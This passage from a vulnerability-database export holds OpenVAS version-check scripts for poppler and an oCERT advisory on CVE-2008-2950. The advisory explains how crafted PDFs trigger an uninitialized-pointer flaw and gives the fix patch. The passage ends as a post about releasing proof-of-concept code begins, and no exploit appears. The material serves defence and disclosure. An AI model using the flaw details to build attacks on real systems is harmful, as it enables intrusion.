script_copyright(\"Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"app-text/poppler\", unaffected: make_list(\"ge 0.6.3-r1\"), vulnerable: make_list(\"lt 0.6.3-r1\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:56:27", "bulletinFamily": "scanner", "description": "Check for the Version of poppler", "modified": "2017-07-10T00:00:00", "published": "2009-02-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=860449", "id": "OPENVAS:860449", "title": "Fedora Update for poppler FEDORA-2008-7104", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for poppler FEDORA-2008-7104\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"poppler on Fedora 8\";\ntag_insight = \"Poppler, a PDF rendering library, it's a fork of the xpdf PDF\n viewer developed by Derek Noonburg of Glyph and Cog, LLC.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2008-August/msg00161.html\");\n script_id(860449);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-17 17:03:12 +0100 (Tue, 17 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2008-7104\");\n script_cve_id(\"CVE-2008-2950\");\n script_name( \"Fedora Update for poppler FEDORA-2008-7104\");\n\n script_summary(\"Check for the Version of poppler\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC8\")\n{\n\n if ((res = isrpmvuln(pkg:\"poppler\", rpm:\"poppler~0.6.2~2.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:56:15", "bulletinFamily": "scanner", "description": "Check for the Version of poppler", "modified": "2017-07-10T00:00:00", "published": "2009-02-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=860956", "id": "OPENVAS:860956", "title": "Fedora Update for poppler FEDORA-2008-7012", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for poppler FEDORA-2008-7012\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"poppler on Fedora 9\";\ntag_insight = \"Poppler, a PDF rendering library, is a fork of the xpdf PDF\n viewer developed by Derek Noonburg of Glyph and Cog, LLC.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2008-September/msg00697.html\");\n script_id(860956);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-17 17:03:12 +0100 (Tue, 17 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2008-7012\");\n script_cve_id(\"CVE-2008-2950\");\n script_name( \"Fedora Update for poppler FEDORA-2008-7012\");\n\n script_summary(\"Check for the Version of poppler\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC9\")\n{\n\n if ((res = isrpmvuln(pkg:\"poppler\", rpm:\"poppler~0.8.1~2.fc9\", rls:\"FC9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-04T11:29:01", "bulletinFamily": "scanner", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-631-1", "modified": "2017-12-01T00:00:00", "published": "2009-03-23T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=840277", "id": "OPENVAS:840277", "title": "Ubuntu Update for poppler vulnerability USN-631-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_631_1.nasl 7969 2017-12-01 09:23:16Z santu $\n#\n# Ubuntu Update for poppler vulnerability USN-631-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Felipe Andres Manzano discovered that poppler did not correctly initialize\n certain page widgets. If a user were tricked into viewing a malicious\n PDF file, a remote attacker could exploit this to crash applications\n linked against poppler, leading to a denial of service.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-631-1\";\ntag_affected = \"poppler vulnerability on Ubuntu 7.10 ,\n Ubuntu 8.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-631-1/\");\n script_id(840277);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-23 10:59:50 +0100 (Mon, 23 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"USN\", value: \"631-1\");\n script_cve_id(\"CVE-2008-2950\");\n script_name( \"Ubuntu Update for poppler vulnerability USN-631-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libpoppler-dev\", ver:\"0.6.4-1ubuntu3.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpoppler-glib-dev\", ver:\"0.6.4-1ubuntu3.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpoppler-glib2\", ver:\"0.6.4-1ubuntu3.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpoppler-qt-dev\", ver:\"0.6.4-1ubuntu3.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpoppler-qt2\", ver:\"0.6.4-1ubuntu3.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpoppler-qt4-2\", ver:\"0.6.4-1ubuntu3.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpoppler-qt4-dev\", ver:\"0.6.4-1ubuntu3.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpoppler2\", ver:\"0.6.4-1ubuntu3.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"poppler-utils\", ver:\"0.6.4-1ubuntu3.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU7.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libpoppler-dev\", ver:\"0.6-0ubuntu2.3\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpoppler-glib-dev\", ver:\"0.6-0ubuntu2.3\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpoppler-glib2\", ver:\"0.6-0ubuntu2.3\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpoppler-qt-dev\", ver:\"0.6-0ubuntu2.3\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpoppler-qt2\", ver:\"0.6-0ubuntu2.3\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpoppler-qt4-2\", ver:\"0.6-0ubuntu2.3\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpoppler-qt4-dev\", ver:\"0.6-0ubuntu2.3\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpoppler2\", ver:\"0.6-0ubuntu2.3\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"poppler-utils\", ver:\"0.6-0ubuntu2.3\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:56:54", "bulletinFamily": "scanner", "description": "The remote host is missing an update to poppler\nannounced via advisory FEDORA-2009-6982.", "modified": "2017-07-10T00:00:00", "published": "2009-06-30T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=64302", "id": "OPENVAS:64302", "title": "Fedora Core 9 FEDORA-2009-6982 (poppler)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_6982.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-6982 (poppler)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nAn update to address jbig2-related security issues.\n\nChangeLog:\n\n* Fri Jan 23 2009 Rex Dieter - 0.8.7-2\n- use backported jbig2_security patch from debian/ubuntu (#496943)\n- poppler-data-0.2.1\n- --enable-libjpeg (speed)\n- track sonames\n- patch to workaround okular rendering hyperlinks (#480357)\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update poppler' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-6982\";\ntag_summary = \"The remote host is missing an update to poppler\nannounced via advisory FEDORA-2009-6982.\";\n\n\n\nif(description)\n{\n script_id(64302);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-30 00:29:55 +0200 (Tue, 30 Jun 2009)\");\n script_cve_id(\"CVE-2008-2950\", \"CVE-2009-0146\", \"CVE-2009-0147\", \"CVE-2009-0166\", \"CVE-2009-0799\", \"CVE-2009-0800\", \"CVE-2009-1179\", \"CVE-2009-1180\", \"CVE-2009-1181\", \"CVE-2009-1182\", \"CVE-2009-1183\", \"CVE-2009-1187\", \"CVE-2009-1188\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Core 9 FEDORA-2009-6982 (poppler)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=496943\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"poppler\", rpm:\"poppler~0.8.7~2.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"poppler-devel\", rpm:\"poppler-devel~0.8.7~2.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"poppler-glib\", rpm:\"poppler-glib~0.8.7~2.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"poppler-glib-devel\", rpm:\"poppler-glib-devel~0.8.7~2.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"poppler-qt\", rpm:\"poppler-qt~0.8.7~2.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"poppler-qt-devel\", rpm:\"poppler-qt-devel~0.8.7~2.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"poppler-qt4\", rpm:\"poppler-qt4~0.8.7~2.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"poppler-qt4-devel\", rpm:\"poppler-qt4-devel~0.8.7~2.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"poppler-utils\", rpm:\"poppler-utils~0.8.7~2.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"poppler-debuginfo\", rpm:\"poppler-debuginfo~0.8.7~2.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:39:45", "bulletinFamily": "scanner", "description": "The remote host is missing an update to poppler\nannounced via advisory FEDORA-2009-6982.", "modified": "2018-04-06T00:00:00", "published": "2009-06-30T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064302", "id": "OPENVAS:136141256231064302", "title": "Fedora Core 9 FEDORA-2009-6982 (poppler)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_6982.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-6982 (poppler)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nAn update to address jbig2-related security issues.\n\nChangeLog:\n\n* Fri Jan 23 2009 Rex Dieter - 0.8.7-2\n- use backported jbig2_security patch from debian/ubuntu (#496943)\n- poppler-data-0.2.1\n- --enable-libjpeg (speed)\n- track sonames\n- patch to workaround okular rendering hyperlinks (#480357)\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update poppler' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-6982\";\ntag_summary = \"The remote host is missing an update to poppler\nannounced via advisory FEDORA-2009-6982.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64302\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-30 00:29:55 +0200 (Tue, 30 Jun 2009)\");\n script_cve_id(\"CVE-2008-2950\", \"CVE-2009-0146\", \"CVE-2009-0147\", \"CVE-2009-0166\", \"CVE-2009-0799\", \"CVE-2009-0800\", \"CVE-2009-1179\", \"CVE-2009-1180\", \"CVE-2009-1181\", \"CVE-2009-1182\", \"CVE-2009-1183\", \"CVE-2009-1187\", \"CVE-2009-1188\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Core 9 FEDORA-2009-6982 (poppler)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=496943\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"poppler\", rpm:\"poppler~0.8.7~2.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"poppler-devel\", rpm:\"poppler-devel~0.8.7~2.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"poppler-glib\", rpm:\"poppler-glib~0.8.7~2.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"poppler-glib-devel\", rpm:\"poppler-glib-devel~0.8.7~2.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"poppler-qt\", rpm:\"poppler-qt~0.8.7~2.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"poppler-qt-devel\", rpm:\"poppler-qt-devel~0.8.7~2.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"poppler-qt4\", rpm:\"poppler-qt4~0.8.7~2.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"poppler-qt4-devel\", rpm:\"poppler-qt4-devel~0.8.7~2.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"poppler-utils\", rpm:\"poppler-utils~0.8.7~2.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"poppler-debuginfo\", rpm:\"poppler-debuginfo~0.8.7~2.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:26", "bulletinFamily": "software", "description": "\r\n2008/07/07 #2008-007 libpoppler uninitialized pointer\r\n\r\nDescription:\r\n\r\nThe poppler PDF rendering library suffers a memory management bug which leads\r\nto arbitrary code execution.\r\n\r\nThe vulnerability is present in the Page class constructor/destructor. The\r\npageWidgets object is not initialized in the Page constructor if specific\r\nconditions are met, but it is deleted afterwards in the destructor regardless\r\nof its initialization.\r\n\r\nSpecific PDF files can be crafted which allocate arbitrary memory to trigger\r\nthe vulnerability.\r\n\r\nA new poppler version addressing the issue is scheduled to be released on\r\nJuly 30th according to maintainer.\r\n\r\nThe following patch fixes the issue:\r\n\r\n\r\ndiff --git a/poppler/Page.cc b/poppler/Page.cc\r\nindex b28a3ee..72a706b 100644\r\n--- a/poppler/Page.cc\r\n+++ b/poppler/Page.cc\r\n@@ -230,7 +230,7 @@ GBool PageAttrs::readBox(Dict *dict, char *key, PDFRectangle *box) {\r\n \r\n Page::Page(XRef *xrefA, int numA, Dict *pageDict, PageAttrs *attrsA, Form *form) {\r\n Object tmp;\r\n- \r\n+ pageWidgets = NULL; //Security fix\r\n ok = gTrue;\r\n xref = xrefA;\r\n num = numA;\r\n\r\n\r\nAffected version:\r\n\r\npoppler <= 0.8.4\r\n\r\nFixed version:\r\n\r\npoppler, N/A\r\n\r\nCredit: vulnerability report, patch and PoC code received from Felipe Andres\r\nManzano <fmanzano [at] fceia [dot] unr [dot] edu [dot] ar>.\r\n\r\nCVE: CVE-2008-2950\r\n\r\nTimeline:\r\n2008-06-27: vulnerability report received\r\n2008-06-28: contacted poppler maintainers and affected vendors\r\n2008-06-30: maintainer confirms issue and patch\r\n2008-07-07: advisory release\r\n\r\nReferences:\r\n\r\nLinks:\r\nhttp://poppler.freedesktop.org\r\n\r\nPermalink:\r\nhttp://www.ocert.org/advisories/ocert-2008-007.html\r\n\r\n-- \r\nAndrea Barisani | Founder & Project Coordinator\r\n oCERT | Open Source Computer Emergency Response Team\r\n\r\n<lcars@ocert.org> http://www.ocert.org\r\n 0x864C9B9E 0A76 074A 02CD E989 CE7F AC3F DA47 578E 864C 9B9E\r\n "Pluralitas non est ponenda sine necessitate"", "modified": "2008-07-09T00:00:00", "published": "2008-07-09T00:00:00", "id": "SECURITYVULNS:DOC:20134", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20134", "title": "[oCERT-2008-007] libpoppler uninitialized pointer", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:30", "bulletinFamily": "software", "description": "Uninitialized pointer dereference on PDF parsing.", "modified": "2008-07-10T00:00:00", "published": "2008-07-10T00:00:00", "id": "SECURITYVULNS:VULN:9139", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9139", "title": "libpoppler library uninitialized pointer", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:26", "bulletinFamily": "software", "description": "hi.\r\nI was in doubt about releasing this because of there is no official patch.\r\nI suppose at this point anyone could accomplish the same thing so, again\r\nI'm in doubt.\r\nA 